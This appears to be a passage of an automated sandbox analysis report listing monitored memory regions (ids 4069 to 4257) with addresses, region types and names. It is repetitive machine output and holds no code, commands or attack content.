region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4069 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4072 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4073 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4076 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4077 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4078 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4079 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4080 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4081 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4082 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4085 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4086 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4087 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4088 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4089 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4090 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4091 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4092 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4095 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4096 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4097 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4098 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4099 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4100 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4101 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4102 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4103 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4104 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4105 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4106 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4107 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4108 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4109 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4110 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4111 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4112 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4113 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4114 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4115 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4116 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4117 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4118 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4119 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4120 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4121 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4122 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4123 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4124 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4125 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4126 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4127 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4128 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4129 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4130 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4131 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4132 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4133 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4134 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4135 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4136 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4139 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4140 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4164 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4165 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4167 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4168 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4169 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4170 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4171 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4178 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4179 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4180 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4181 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4182 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4183 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4184 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4185 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4186 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4187 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4188 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4189 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4190 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4191 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4192 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4193 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4194 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4195 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4196 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4197 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4198 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4199 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4200 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4201 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4202 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4203 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4204 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4205 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4206 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4209 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4210 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4211 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4212 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4213 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4214 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4215 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4216 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4217 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4218 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4219 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4220 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4221 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4222 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4223 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4224 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4225 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4239 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4240 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4241 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4242 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4243 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4244 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4245 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4254 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4255 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4257 